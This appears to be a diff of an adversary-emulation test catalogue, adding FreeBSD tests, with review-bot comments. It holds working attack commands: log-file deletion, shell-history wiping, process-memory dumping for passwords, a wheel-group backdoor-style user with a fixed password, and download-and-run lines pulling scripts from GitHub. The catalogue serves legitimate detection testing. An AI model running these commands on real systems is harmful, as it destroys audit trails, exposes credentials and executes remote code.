"auto_generated_guid": "848e43b3-4c0a-4e4c-b4c9-d1e8cea9651c", @@ -191381,6 +191904,19 @@ "elevation_required": true } }, + { + "name": "Delete system log files via unlink utility (freebsd)", + "auto_generated_guid": "45ad4abd-19bd-4c5f-a687-41f3eee8d8c2", + "description": "This test deletes the messages log file using unlink utility\n", + "supported_platforms": [ + "linux" + ], + "executor": { + "command": "unlink /var/log/messages\n", + "name": "sh", + "elevation_required": true + } + }, { "name": "Delete system log files using shred utility", "auto_generated_guid": "86f0e4d5-3ca7-45fb-829d-4eda32b232bb", 
@@ -207865,6 +208401,7 @@ ], "command_list": [ "sh /tmp/T1003.007.sh\nPID=$(pgrep -n -f \"T1003.007\")\nHEAP_MEM=$(grep -E \"^[0-9a-f-]* r\" /proc/\"$PID\"/maps | grep heap | cut -d' ' -f 1)\nMEM_START=$(echo $((0x$(echo \"$HEAP_MEM\" | cut -d\"-\" -f1))))\nMEM_STOP=$(echo $((0x$(echo \"$HEAP_MEM\" | cut -d\"-\" -f2))))\nMEM_SIZE=$(echo $((0x$MEM_STOP-0x$MEM_START)))\ndd if=/proc/\"${PID}\"/mem of=\"/tmp/T1003.007.bin\" ibs=1 skip=\"$MEM_START\" count=\"$MEM_SIZE\"\ngrep -i \"PASS\" \"/tmp/T1003.007.bin\"\n", + "sh /tmp/T1003.007.sh\nPID=$(pgrep -n -f \"T1003.007\")\nMEM_START=$(head -n 5 /proc/\"${PID}\"/map | tail -1 | cut -d' ' -f1)\nMEM_STOP=$(head -n 5 /proc/\"${PID}\"/map | tail -1 | cut -d' ' -f2)\nMEM_SIZE=$(echo $(($MEM_STOP-$MEM_START)))\ndd if=/proc/\"${PID}\"/mem of=\"/tmp/T1003.007.bin\" ibs=1 skip=\"$MEM_START\" count=\"$MEM_SIZE\"\nstrings \"/tmp/T1003.007.bin\" | grep -i PASS\n", "sh /tmp/T1003.007.sh\nPID=$(pgrep -n -f \"T1003.007\")\nPYTHON=$(which python || which python3 || which python2)\n$PYTHON /T1003.007/src/dump_heap.py $PID /tmp/T1003.007.bin\ngrep -i \"PASS\" \"/tmp/T1003.007.bin\"\n", "sudo /tmp/mimipenguin/mimipenguin_2.0-release/mimipenguin.sh > /tmp/T1003.007Test3.txt\ncat /tmp/T1003.007Test3.txt\n" ], 
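Review bot: The FreeBSD variant selects the region to dump with `head -n 5 /proc/"${PID}"/map | tail -1`, i.e. always the fifth map entry, whereas the Linux entry beside it greps the maps for `heap`; which mapping is fifth depends on the binary and libraries loaded, so the `PASS` string may well lie outside the dumped range and the closing `strings ... | grep -i PASS` prints nothing even though the test ran. Selecting the mapping by its permission and backing-type columns rather than by position would be more robust; at minimum the description should state that only the fifth mapping is dumped so a silent miss is not mistaken for a defence working. The full test definition using the same pipeline is in the `@@ -207916` hunk on the next line.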
@@ -207916,10 +208453,48 @@ "cleanup_command": "rm -f \"#{output_file}\"\n" } }, + { + "name": "Dump individual process memory with sh on FreeBSD (Local)", + "auto_generated_guid": "fa37b633-e097-4415-b2b8-c5bf4c86e423", + "description": "Using `/proc/$PID/mem`, where $PID is the target process ID, use shell utilities to\ncopy process memory to an external file so it can be searched or exfiltrated later.\nOn FreeBSD procfs must be mounted.\n", + "supported_platforms": [ + "linux" + ], + "input_arguments": { + "output_file": { + "description": "Path where captured results will be placed", + "type": "path", + "default": "/tmp/T1003.007.bin" + }, + "script_path": { + "description": "Path to script generating the target process", + "type": "path", + "default": "/tmp/T1003.007.sh" + }, + "pid_term": { + "description": "Unique string to use to identify target process", + "type": "string", + "default": "T1003.007" + } + }, + "dependencies": [ + { + "description": "Script to launch target process must exist\n", + "prereq_command": "test -f #{script_path}\ngrep \"#{pid_term}\" #{script_path}\n", + "get_prereq_command": "echo '#!/bin/sh' > #{script_path}\necho \"sh -c 'echo \\\"The password is #{pid_term}\\\" && sleep 30' &\" >> #{script_path}\n" + } + ], + "executor": { + "name": "sh", + "elevation_required": true, + "command": "sh #{script_path}\nPID=$(pgrep -n -f \"#{pid_term}\")\nMEM_START=$(head -n 5 /proc/\"${PID}\"/map | tail -1 | cut -d' ' -f1)\nMEM_STOP=$(head -n 5 /proc/\"${PID}\"/map | tail -1 | cut -d' ' -f2)\nMEM_SIZE=$(echo $(($MEM_STOP-$MEM_START)))\ndd if=/proc/\"${PID}\"/mem of=\"#{output_file}\" ibs=1 skip=\"$MEM_START\" count=\"$MEM_SIZE\"\nstrings \"#{output_file}\" | grep -i PASS\n", + "cleanup_command": "rm -f \"#{output_file}\"\n" + } + }, { "name": "Dump individual process memory with Python (Local)", "auto_generated_guid": "437b2003-a20d-4ed8-834c-4964f24eec63", - "description": "Using `/proc/$PID/mem`, where $PID is the target process ID, use a 
Python script to\ncopy a process's heap memory to an external file so it can be searched or exfiltrated later.\n", + "description": "Using `/proc/$PID/mem`, where $PID is the target process ID, use a Python script to\ncopy a process's heap memory to an external file so it can be searched or exfiltrated later.\nOn FreeBSD procfs must be mounted.\n", "supported_platforms": [ "linux" ], @@ -209883,7 +210458,7 @@ "command_list": [ "tasklist.exe\nsc query\nsc query state= all\n", "net.exe start >> %temp%\\service-list.txt\n", - "systemctl --type=service\n", + "if [ \"$(uname)\" = 'FreeBSD' ]; then service -e; else systemctl --type=service; fi;\n", "Get-Service" ], "commands": [], @@ -210020,14 +210595,14 @@ } }, { - "name": "System Service Discovery - systemctl", + "name": "System Service Discovery - systemctl/service", "auto_generated_guid": "f4b26bce-4c2c-46c0-bcc5-fce062d38bef", - "description": "Enumerates system service using systemctl\n", + "description": "Enumerates system service using systemctl/service\n", "supported_platforms": [ "linux" ], "executor": { - "command": "systemctl --type=service\n", + "command": "if [ \"$(uname)\" = 'FreeBSD' ]; then service -e; else systemctl --type=service; fi;\n", "name": "bash" } } @@ -210407,6 +210982,7 @@ ], "command_list": [ "tcpdump -c 5 -nnni ens33\ntshark -c 5 -i ens33\n", + "tcpdump -c 5 -nnni em0\ntshark -c 5 -i em0\n", "sudo tcpdump -c 5 -nnni en0A \nif [ -x \"$(command -v tshark)\" ]; then sudo tshark -c 5 -i en0A; fi;\n", "\"c:\\Program Files\\Wireshark\\tshark.exe\" -i Ethernet -c 5\n", "netsh trace start capture=yes tracefile=%temp%\\trace.etl maxsize=10", 
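Review bot: The 'System Service Discovery - systemctl/service' executor now branches on `uname` to run `service -e` on FreeBSD, but the executor is still `"name": "bash"`; bash is not part of the FreeBSD base system, so on the very host the branch was added for the test cannot launch unless bash was installed separately. The command uses only POSIX constructs, so `"name": "sh"` works for both branches and matches what the other FreeBSD tests in this diff use. The pre-rendered copy in the `@@ -209883` command_list hunk is unaffected.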
@@ -210414,6 +210990,8 @@ "pktmon.exe filter add -p 445\n", "sudo /tmp/t1040_macos_pcapdemo -i en0 -t 3\n", "sudo /tmp/t1040_macos_pcapdemo -f -i en0 -t 3\n", + "sudo /tmp/t1040_freebsd_pcapdemo -i em0 -t 3\n", + "sudo /tmp/t1040_freebsd_pcapdemo -f -i em0 -t 3\n", "sudo /tmp/t1040_linux_pcapdemo -a -t 3\n", "sudo /tmp/t1040_linux_pcapdemo -4 -p 6 -t 3\n", "sudo /tmp/t1040_linux_pcapdemo -4 -P -p 17 -t 3\n", @@ -210548,6 +211126,34 @@ "elevation_required": true } }, + { + "name": "Packet Capture FreeBSD using tshark or tcpdump", + "auto_generated_guid": "c93f2492-9ebe-44b5-8b45-36574cccfe67", + "description": "Perform a PCAP. Wireshark will be required for tshark. TCPdump may already be installed.\n\nUpon successful execution, tshark or tcpdump will execute and capture 5 packets on interface ens33.\n", + "supported_platforms": [ + "linux" + ], + "input_arguments": { + "interface": { + "description": "Specify interface to perform PCAP on.", + "type": "string", + "default": "em0" + } + }, + "dependency_executor_name": "sh", + "dependencies": [ + { + "description": "Check if at least one of tcpdump or tshark is installed.\n", + "prereq_command": "if [ ! -x \"$(command -v tcpdump)\" ] && [ ! -x \"$(command -v tshark)\" ]; then exit 1; else exit 0; fi;\n", + "get_prereq_command": "(which pkg && pkg install -y wireshark-nox11)\n" + } + ], + "executor": { + "command": "tcpdump -c 5 -nnni #{interface}\ntshark -c 5 -i #{interface}\n", + "name": "sh", + "elevation_required": true + } + }, { "name": "Packet Capture macOS using tcpdump or tshark", "auto_generated_guid": "9d04efee-eff5-4240-b8d2-07792b873608", 
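Review bot: The description of 'Packet Capture FreeBSD using tshark or tcpdump' says the tools `capture 5 packets on interface ens33`, but the `interface` argument defaults to `em0`; `Upon successful execution, tshark or tcpdump will execute and capture 5 packets on interface #{interface} (default em0).` matches the executor. The prerequisite accepts either tool being present while the executor runs both unconditionally, so a host with only tcpdump (the usual case, since tcpdump is in the base system and the prereq installs only wireshark-nox11) prints a not-found error for tshark after a successful capture; guarding each line with a `command -v` check would keep the result unambiguous.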
@@ -210749,6 +211355,84 @@ "elevation_required": true } }, + { + "name": "Packet Capture FreeBSD using /dev/bpfN with sudo", + "auto_generated_guid": "e2028771-1bfb-48f5-b5e6-e50ee0942a14", + "description": "Opens a /dev/bpf file (O_RDONLY) and captures packets for a few seconds.\n", + "supported_platforms": [ + "linux" + ], + "input_arguments": { + "ifname": { + "description": "Specify interface to perform PCAP on.", + "type": "string", + "default": "em0" + }, + "csource_path": { + "description": "Path to C program source", + "type": "string", + "default": "PathToAtomicsFolder/T1040/src/freebsd_pcapdemo.c" + }, + "program_path": { + "description": "Path to compiled C program", + "type": "string", + "default": "/tmp/t1040_freebsd_pcapdemo" + } + }, + "dependency_executor_name": "sh", + "dependencies": [ + { + "description": "compile C program\n", + "prereq_command": "exit 1\n", + "get_prereq_command": "cc #{csource_path} -o #{program_path}\n" + } + ], + "executor": { + "command": "sudo #{program_path} -i #{ifname} -t 3\n", + "cleanup_command": "rm -f #{program_path}\n", + "name": "sh", + "elevation_required": true + } + }, + { + "name": "Filtered Packet Capture FreeBSD using /dev/bpfN with sudo", + "auto_generated_guid": "a3a0d4c9-c068-4563-a08d-583bd05b884c", + "description": "Opens a /dev/bpf file (O_RDONLY), sets BPF filter for 'udp' and captures packets for a few seconds.\n", + "supported_platforms": [ + "linux" + ], + "input_arguments": { + "ifname": { + "description": "Specify interface to perform PCAP on.", + "type": "string", + "default": "em0" + }, + "csource_path": { + "description": "Path to C program source", + "type": "string", + "default": "PathToAtomicsFolder/T1040/src/freebsd_pcapdemo.c" + }, + "program_path": { + "description": "Path to compiled C program", + "type": "string", + "default": "/tmp/t1040_freebsd_pcapdemo" + } + }, + "dependency_executor_name": "sh", + "dependencies": [ + { + "description": "compile C program\n", + "prereq_command": 
"exit 1\n", + "get_prereq_command": "cc #{csource_path} -o #{program_path}\n" + } + ], + "executor": { + "command": "sudo #{program_path} -f -i #{ifname} -t 3\n", + "cleanup_command": "rm -f #{program_path}\n", + "name": "sh", + "elevation_required": true + } + }, { "name": "Packet Capture Linux socket AF_PACKET,SOCK_RAW with sudo", "auto_generated_guid": "10c710c9-9104-4d5f-8829-5b65391e2a29", @@ -213435,6 +214119,7 @@ "auxiliary/scanner/smb/smb_enumshares", "df -aH\nsmbutil view -g //computer1\nshowmount computer1\n", "sudo smbstatus --shares\n", + "smbstatus --shares\n", "net view \\\\localhost\n", "get-smbshare\n", "net share\n", @@ -213604,6 +214289,39 @@ "elevation_required": true } }, + { + "name": "Network Share Discovery - FreeBSD", + "auto_generated_guid": "77e468a6-3e5c-45a1-9948-c4b5603747cb", + "description": "Network Share Discovery using smbstatus\n", + "supported_platforms": [ + "linux" + ], + "input_arguments": { + "package_checker": { + "description": "Package checking command. pkg info -x samba", + "type": "string", + "default": "(pkg info -x samba &>/dev/null)" + }, + "package_installer": { + "description": "Package installer command. pkg install -y samba413", + "type": "string", + "default": "(which pkg && pkg install -y samba413)" + } + }, + "dependency_executor_name": "sh", + "dependencies": [ + { + "description": "Package with smbstatus (samba) must exist on device\n", + "prereq_command": "if #{package_checker} > /dev/null; then exit 0; else exit 1; fi\n", + "get_prereq_command": "#{package_installer} \n" + } + ], + "executor": { + "command": "smbstatus --shares\n", + "name": "sh", + "elevation_required": true + } + }, { "name": "Network Share Discovery command prompt", "auto_generated_guid": "20f1097d-81c1-405c-8380-32174d493bbb", 
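Review bot: Both new bpf tests use `"prereq_command": "exit 1\n"`, which makes the prerequisite check fail unconditionally so `cc` runs before every execution; `"prereq_command": "test -x #{program_path}\n"` states the real prerequisite (a compiled binary) and still triggers the compile when it is missing. The two tests share the same `program_path` default and each `cleanup_command` deletes it, so whichever runs second recompiles anyway, which is worth a line in the descriptions. The executor also sets `elevation_required: true`, so the leading `sudo` in `sudo #{program_path} -i #{ifname} -t 3` is redundant. This hunk starts on the previous line.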
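Review bot: In 'Network Share Discovery - FreeBSD' the `package_checker` default `(pkg info -x samba &>/dev/null)` runs under `sh` (`dependency_executor_name` is `sh`), and `&>` is a bash extension: POSIX sh parses it as `pkg info -x samba &` followed by `> /dev/null`, backgrounding the check and returning 0 regardless of the result, so `if #{package_checker} > /dev/null; then exit 0` always reports samba as installed and `get_prereq_command` never runs. `"default": "(pkg info -x samba >/dev/null 2>&1)"` is the intended check. The description `Package checking command. pkg info -x samba` could carry the corrected form as well.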
@@ -217036,9 +217754,10 @@ "sysinfo, run winenum, get_env.rb", "systeminfo\nreg query HKLM\\SYSTEM\\CurrentControlSet\\Services\\Disk\\Enum\n", "system_profiler\nls -al /Applications\n", - "uname -a >> /tmp/T1082.txt\nif [ -f /etc/lsb-release ]; then cat /etc/lsb-release >> /tmp/T1082.txt; fi\nif [ -f /etc/redhat-release ]; then cat /etc/redhat-release >> /tmp/T1082.txt; fi \nif [ -f /etc/issue ]; then cat /etc/issue >> /tmp/T1082.txt; fi\nuptime >> /tmp/T1082.txt\ncat /tmp/T1082.txt 2>/dev/null\n", + "uname -a >> /tmp/T1082.txt\nif [ -f /etc/lsb-release ]; then cat /etc/lsb-release >> /tmp/T1082.txt; fi\nif [ -f /etc/redhat-release ]; then cat /etc/redhat-release >> /tmp/T1082.txt; fi \nif [ -f /etc/issue ]; then cat /etc/issue >> /tmp/T1082.txt; fi\nif [ -f /etc/os-release ]; then cat /etc/os-release >> /tmp/T1082.txt; fi\nuptime >> /tmp/T1082.txt\ncat /tmp/T1082.txt 2>/dev/null\n", "if [ -f /sys/class/dmi/id/bios_version ]; then cat /sys/class/dmi/id/bios_version | grep -i amazon; fi\nif [ -f /sys/class/dmi/id/product_name ]; then cat /sys/class/dmi/id/product_name | grep -i \"Droplet\\|HVM\\|VirtualBox\\|VMware\"; fi\nif [ -f /sys/class/dmi/id/product_name ]; then cat /sys/class/dmi/id/chassis_vendor | grep -i \"Xen\\|Bochs\\|QEMU\"; fi\nif [ -x \"$(command -v dmidecode)\" ]; then sudo dmidecode | grep -i \"microsoft\\|vmware\\|virtualbox\\|quemu\\|domu\"; fi\nif [ -f /proc/scsi/scsi ]; then cat /proc/scsi/scsi | grep -i \"vmware\\|vbox\"; fi\nif [ -f /proc/ide/hd0/model ]; then cat /proc/ide/hd0/model | grep -i \"vmware\\|vbox\\|qemu\\|virtual\"; fi\nif [ -x \"$(command -v lspci)\" ]; then sudo lspci | grep -i \"vmware\\|virtualbox\"; fi\nif [ -x \"$(command -v lscpu)\" ]; then sudo lscpu | grep -i \"Xen\\|KVM\\|Microsoft\"; fi\n", "sudo lsmod | grep -i \"vboxsf\\|vboxguest\"\nsudo lsmod | grep -i \"vmw_baloon\\|vmxnet\"\nsudo lsmod | grep -i \"xen-vbd\\|xen-vnif\"\nsudo lsmod | grep -i \"virtio_pci\\|virtio_net\"\nsudo lsmod | grep -i 
\"hv_vmbus\\|hv_blkvsc\\|hv_netvsc\\|hv_utils\\|hv_storvsc\"\n", + "kldstat | grep -i \"vmm\"\nkldstat | grep -i \"vbox\"\n", "hostname\n", "hostname\n", "REG QUERY HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography /v MachineGuid\n", @@ -217058,6 +217777,7 @@ "iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/PowerSharpPack/master/PowerSharpBinaries/Invoke-Seatbelt.ps1')\nInvoke-Seatbelt -Command \"-group=all\"; pause", "Import-Module \"\\..\\ExternalPayloads\\AzureStealth.ps1\" -force \n$Password = ConvertTo-SecureString -String \"T1082Az\" -AsPlainText -Force\n$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList \"#{username}\", $Password\nConnect-AzAccount -Credential $Credential\nConnect-AzureAD -Credential $Credential\nScan-AzureAdmins -UseCurrentCred\n", "lsmod\nkmod list\ngrep vmw /proc/modules\n", + "kldstat\nkldstat | grep vmm\n", "wmic cpu get name\nwmic MEMPHYSICAL get MaxCapacity\nwmic baseboard get product\nwmic baseboard get version\nwmic bios get SMBIOSBIOSVersion\nwmic path win32_VideoController get name\nwmic path win32_VideoController get DriverVersion\nwmic path win32_VideoController get VideoModeDescription\nwmic OS get Caption,OSArchitecture,Version\nwmic DISKDRIVE get Caption\nGet-WmiObject win32_bios\n", "driverquery /v\ndriverquery /si\n", "wscript.exe C:\\Windows\\System32\\gatherNetworkInfo.vbs\n", 
@@ -217212,7 +217932,7 @@ } }, "executor": { - "command": "uname -a >> #{output_file}\nif [ -f /etc/lsb-release ]; then cat /etc/lsb-release >> #{output_file}; fi\nif [ -f /etc/redhat-release ]; then cat /etc/redhat-release >> #{output_file}; fi \nif [ -f /etc/issue ]; then cat /etc/issue >> #{output_file}; fi\nuptime >> #{output_file}\ncat #{output_file} 2>/dev/null\n", + "command": "uname -a >> #{output_file}\nif [ -f /etc/lsb-release ]; then cat /etc/lsb-release >> #{output_file}; fi\nif [ -f /etc/redhat-release ]; then cat /etc/redhat-release >> #{output_file}; fi \nif [ -f /etc/issue ]; then cat /etc/issue >> #{output_file}; fi\nif [ -f /etc/os-release ]; then cat /etc/os-release >> #{output_file}; fi\nuptime >> #{output_file}\ncat #{output_file} 2>/dev/null\n", "cleanup_command": "rm #{output_file} 2>/dev/null\n", "name": "sh" } @@ -217242,6 +217962,18 @@ "name": "bash" } }, + { + "name": "FreeBSD VM Check via Kernel Modules", + "auto_generated_guid": "eefe6a49-d88b-41d8-8fc2-b46822da90d3", + "description": "Identify virtual machine host kernel modules.\n", + "supported_platforms": [ + "linux" + ], + "executor": { + "command": "kldstat | grep -i \"vmm\"\nkldstat | grep -i \"vbox\"\n", + "name": "sh" + } + }, { "name": "Hostname Discovery (Windows)", "auto_generated_guid": "85cfbf23-4a1e-4342-8792-007e004b975f", @@ -217257,14 +217989,14 @@ { "name": "Hostname Discovery", "auto_generated_guid": "486e88ea-4f56-470f-9b57-3f4d73f39133", - "description": "Identify system hostname for Linux and macOS systems.\n", + "description": "Identify system hostname for FreeBSD, Linux and macOS systems.\n", "supported_platforms": [ "linux", "macos" ], "executor": { "command": "hostname\n", - "name": "bash" + "name": "sh" } }, { 
@@ -217320,12 +218052,12 @@ } }, { - "name": "Environment variables discovery on macos and linux", + "name": "Environment variables discovery on freebsd, macos and linux", "auto_generated_guid": "fcbdd43f-f4ad-42d5-98f3-0218097e2720", "description": "Identify all environment variables. Upon execution, environments variables and your path info will be displayed.\n", "supported_platforms": [ - "macos", - "linux" + "linux", + "macos" ], "executor": { "command": "env\n", @@ -217521,6 +218253,18 @@ "name": "sh" } }, + { + "name": "FreeBSD List Kernel Modules", + "auto_generated_guid": "4947897f-643a-4b75-b3f5-bed6885749f6", + "description": "Enumerate kernel modules loaded. Upon successful execution stdout will display kernel modules loaded, followed by list of modules matching 'vmm' if present.\n", + "supported_platforms": [ + "linux" + ], + "executor": { + "command": "kldstat\nkldstat | grep vmm\n", + "name": "sh" + } + }, { "name": "System Information Discovery with WMIC", "auto_generated_guid": "8851b73a-3624-4bf7-8704-aa312411565c", @@ -228343,9 +229087,9 @@ "display_name": "Browser Extensions", "atomic_tests": [ { - "name": "Chrome (Developer Mode)", + "name": "Chrome/Chromium (Developer Mode)", "auto_generated_guid": "3ecd790d-2617-4abf-9a8c-4e8d47da9ee1", - "description": "Turn on Chrome developer mode and Load Extension found in the src directory", + "description": "Turn on Chrome/Chromium developer mode and Load Extension found in the src directory", "supported_platforms": [ "linux", "windows", @@ -228357,7 +229101,7 @@ } }, { - "name": "Chrome (Chrome Web Store)", + "name": "Chrome/Chromium (Chrome Web Store)", "auto_generated_guid": "4c83940d-8ca5-4bb2-8100-f46dc914bc3f", "description": "Install the \"Minimum Viable Malicious Extension\" Chrome extension", "supported_platforms": [ 
@@ -232713,14 +233457,21 @@ ], "command_list": [ "rm ~/.bash_history\n", + "rm ~/.sh_history\n", "echo \"\" > ~/.bash_history\n", + "echo \"\" > ~/.sh_history\n", "cat /dev/null > ~/.bash_history\n", + "cat /dev/null > ~/.sh_history\n", "ln -sf /dev/null ~/.bash_history\n", + "ln -sf /dev/null ~/.sh_history\n", "truncate -s0 ~/.bash_history\n", + "truncate -s0 ~/.sh_history\n", "unset HISTFILE\nexport HISTFILESIZE=0\nhistory -c\n", + "unset HISTFILE\nunset histfile\nexport HISTFILESIZE=0\nexport HISTSIZE=0\nhistory -c\n", "set +o history\necho 'set +o history' >> ~/.bashrc\n. ~/.bashrc\nhistory -c\n", "hostname\nwhoami\n", "sshpass -p 'pwd101!' ssh testuser1@localhost -T hostname\n", + "sshpass -p 'pwd101!' ssh testuser1@localhost -T hostname\n", "Set-PSReadlineOption -HistorySaveStyle SaveNothing\n", "Remove-Item (Get-PSReadlineOption).HistorySavePath\n", "Set-PSReadLineOption -AddToHistoryHandler { return $false }\n", @@ -232751,10 +233502,22 @@ "name": "sh" } }, + { + "name": "Clear sh history (rm)", + "auto_generated_guid": "448893f8-1d5d-4ae2-9017-7fcd73a7e100", + "description": "Clears sh history via rm\n", + "supported_platforms": [ + "linux" + ], + "executor": { + "command": "rm ~/.sh_history\n", + "name": "sh" + } + }, { "name": "Clear Bash history (echo)", "auto_generated_guid": "cbf506a5-dd78-43e5-be7e-a46b7c7a0a11", - "description": "Clears bash history via rm\n", + "description": "Clears bash history via echo\n", "supported_platforms": [ "linux" ], @@ -232763,6 +233526,18 @@ "name": "sh" } }, + { + "name": "Clear sh history (echo)", + "auto_generated_guid": "a4d63cb3-9ed9-4837-9480-5bf6b09a6c96", + "description": "Clears sh history via echo\n", + "supported_platforms": [ + "linux" + ], + "executor": { + "command": "echo \"\" > ~/.sh_history\n", + "name": "sh" + } + }, { "name": "Clear Bash history (cat dev/null)", "auto_generated_guid": "b1251c35-dcd3-4ea1-86da-36d27b54f31f", 
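Review bot: The `command_list` hunk now contains `sshpass -p 'pwd101!' ssh testuser1@localhost -T hostname` twice, byte-identical, because the new FreeBSD ssh test reuses the existing command verbatim. If this list is generated from the test definitions that is expected, but if it is meant as a de-duplicated index of commands for detection content, the generator should collapse identical strings rather than emit both.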
@@ -232776,6 +233551,18 @@
 "name": "sh"
 }
 },
+ {
+ "name": "Clear sh history (cat dev/null)",
+ "auto_generated_guid": "ecaefd53-6fa4-4781-ba51-d9d6fb94dbdc",
+ "description": "Clears sh history via cat /dev/null\n",
+ "supported_platforms": [
+ "linux"
+ ],
+ "executor": {
+ "command": "cat /dev/null > ~/.sh_history\n",
+ "name": "sh"
+ }
+ },
 {
 "name": "Clear Bash history (ln dev/null)",
 "auto_generated_guid": "23d348f3-cc5c-4ba9-bd0a-ae09069f0914",
@@ -232789,6 +233576,18 @@
 "name": "sh"
 }
 },
+ {
+ "name": "Clear sh history (ln dev/null)",
+ "auto_generated_guid": "3126aa7a-8768-456f-ae05-6ab2d4accfdd",
+ "description": "Clears sh history via a symlink to /dev/null\n",
+ "supported_platforms": [
+ "linux"
+ ],
+ "executor": {
+ "command": "ln -sf /dev/null ~/.sh_history\n",
+ "name": "sh"
+ }
+ },
 {
 "name": "Clear Bash history (truncate)",
 "auto_generated_guid": "47966a1d-df4f-4078-af65-db6d9aa20739",
@@ -232801,6 +233600,18 @@
 "name": "sh"
 }
 },
+ {
+ "name": "Clear sh history (truncate)",
+ "auto_generated_guid": "e14d9bb0-c853-4503-aa89-739d5c0a5818",
+ "description": "Clears sh history via truncate\n",
+ "supported_platforms": [
+ "linux"
+ ],
+ "executor": {
+ "command": "truncate -s0 ~/.sh_history\n",
+ "name": "sh"
+ }
+ },
 {
 "name": "Clear history of a bunch of shells",
 "auto_generated_guid": "7e6721df-5f08-4370-9255-f06d8a77af4c",
@@ -232814,6 +233625,18 @@
 "name": "sh"
 }
 },
+ {
+ "name": "Clear history of a bunch of shells (freebsd)",
+ "auto_generated_guid": "9bf7c8af-5e12-42ea-bf6b-b0348fb9dfb0",
+ "description": "Clears the history of a bunch of different shell types by setting the history size to zero\n",
+ "supported_platforms": [
+ "linux"
+ ],
+ "executor": {
+ "command": "unset HISTFILE\nunset histfile\nexport HISTFILESIZE=0\nexport HISTSIZE=0\nhistory -c\n",
+ "name": "sh"
+ }
+ },
 {
 "name": "Clear and Disable Bash History Logging",
 "auto_generated_guid": "784e4011-bd1a-4ecd-a63a-8feb278512e6",
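Review bot: `unset histfile` in the new "Clear history of a bunch of shells (freebsd)" command only acts on the `sh` process running the test; `histfile` is a csh/tcsh shell variable and cannot be cleared from `sh`, so the description's claim that it clears "a bunch of different shell types" overstates what the command does. `history -c` is a bash builtin, and whether FreeBSD's `/bin/sh` accepts it is not visible here; if it does not, the last line exits non-zero and the test reports failure. A description such as `Unsets HISTFILE and sets HISTFILESIZE/HISTSIZE to zero for the current sh session; the csh-style histfile line is a no-op from sh` would match the code, or the csh line could be dropped.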
@@ -232861,6 +233684,26 @@
 "name": "sh"
 }
 },
+ {
+ "name": "Disable sh History Logging with SSH -T (freebsd)",
+ "auto_generated_guid": "ec3f2306-dd19-4c4b-bed7-92d20e9b1dee",
+ "description": "Keeps history clear and stays out of lastlog,wtmp,btmp ssh -T keeps the ssh client from catching a proper TTY, which is what usually gets logged on lastlog\n",
+ "supported_platforms": [
+ "linux"
+ ],
+ "dependencies": [
+ {
+ "description": "Install sshpass and create user account used for excuting\n",
+ "prereq_command": "$(getent passwd testuser1 >/dev/null) && $(which sshpass >/dev/null)\n",
+ "get_prereq_command": "pw useradd testuser1 -g wheel -s /bin/sh\necho 'pwd101!' | pw mod user testuser1 -h 0\n(which pkg && pkg install -y sshpass)\n"
+ }
+ ],
+ "executor": {
+ "command": "sshpass -p 'pwd101!' ssh testuser1@localhost -T hostname\n",
+ "cleanup_command": "rmuser -y testuser1\n",
+ "name": "sh"
+ }
+ },
 {
 "name": "Prevent Powershell History Logging",
 "auto_generated_guid": "2f898b81-3e97-4abb-bc3f-a95138988370",
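Review bot: `get_prereq_command` creates `testuser1` in group `wheel` with the fixed password `pwd101!`, and only the `rmuser -y testuser1` in `cleanup_command` removes it, so an aborted run leaves an account with a published password in the group that FreeBSD's `su` requires for root access; the test only needs a login shell, so `pw useradd testuser1 -s /bin/sh` without `-g wheel` is enough. The `prereq_command` form `$(getent passwd testuser1 >/dev/null) && $(which sshpass >/dev/null)` works only through the exit status of an empty command after substitution; `getent passwd testuser1 >/dev/null && command -v sshpass >/dev/null` says the same thing plainly. The dependency description also misspells `executing` as `excuting`.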
@@ -235050,6 +235893,7 @@ ], "command_list": [ "$startingDirectory = \"C:\\Users\"\n$outputZip = \"\\..\\ExternalPayloads\\T1005\"\n$fileExtensionsString = \".doc, .docx, .txt\" \n$fileExtensions = $fileExtensionsString -split \", \"\n\nNew-Item -Type Directory $outputZip -ErrorAction Ignore -Force | Out-Null\n\nFunction Search-Files {\n param (\n [string]$directory\n )\n $files = Get-ChildItem -Path $directory -File -Recurse | Where-Object {\n $fileExtensions -contains $_.Extension.ToLower()\n }\n return $files\n}\n\n$foundFiles = Search-Files -directory $startingDirectory\nif ($foundFiles.Count -gt 0) {\n $foundFilePaths = $foundFiles.FullName\n Compress-Archive -Path $foundFilePaths -DestinationPath \"$outputZip\\data.zip\"\n\n Write-Host \"Zip file created: $outputZip\\data.zip\"\n } else {\n Write-Host \"No files found with the specified extensions.\"\n }\n", + "cd $HOME\ncurl -O https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1005/src/art\ncurl -O https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1005/src/gta.db\ncurl -O https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1005/src/sqlite_dump.sh\nchmod +x sqlite_dump.sh\nfind . ! -executable -exec bash -c 'if [[ \"$(head -c 15 {} | strings)\" == \"SQLite format 3\" ]]; then echo \"{}\"; ./sqlite_dump.sh {}; fi' \\;\n", "powershell/collection/get_sql_column_sample_data", "powershell/collection/get_sql_query", "powershell/collection/minidump", 
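Review bot: The new command's `find . ! -executable -exec bash -c 'if [[ "$(head -c 15 {} | strings)" == "SQLite format 3" ]]; then echo "{}"; ./sqlite_dump.sh {}; fi' \;` substitutes each path into the `bash -c` script text, so a file name containing a quote, `$(` or a backtick is parsed as shell code rather than handled as data. Passing the path as a positional argument, `bash -c '... "$1" ...' _ {} \;` with `"$1"` in place of every `{}`, keeps it data. The same string appears in the test definition in the next hunk; fix it there and regenerate this list.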
@@ -235110,6 +235954,34 @@
 "name": "powershell",
 "elevation_required": false
 }
+ },
+ {
+ "name": "Find and dump sqlite databases (Linux)",
+ "auto_generated_guid": "00cbb875-7ae4-4cf1-b638-e543fd825300",
+ "description": "An adversary may know/assume that the user of a system uses sqlite databases which contain interest and sensitive data. In this test we download two databases and a sqlite dump script, then run a find command to find & dump the database content.\n",
+ "supported_platforms": [
+ "linux"
+ ],
+ "input_arguments": {
+ "remote_url": {
+ "description": "url of remote payload",
+ "type": "url",
+ "default": "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1005/src"
+ }
+ },
+ "dependencies": [
+ {
+ "description": "Check if running on a Debian based machine.\n",
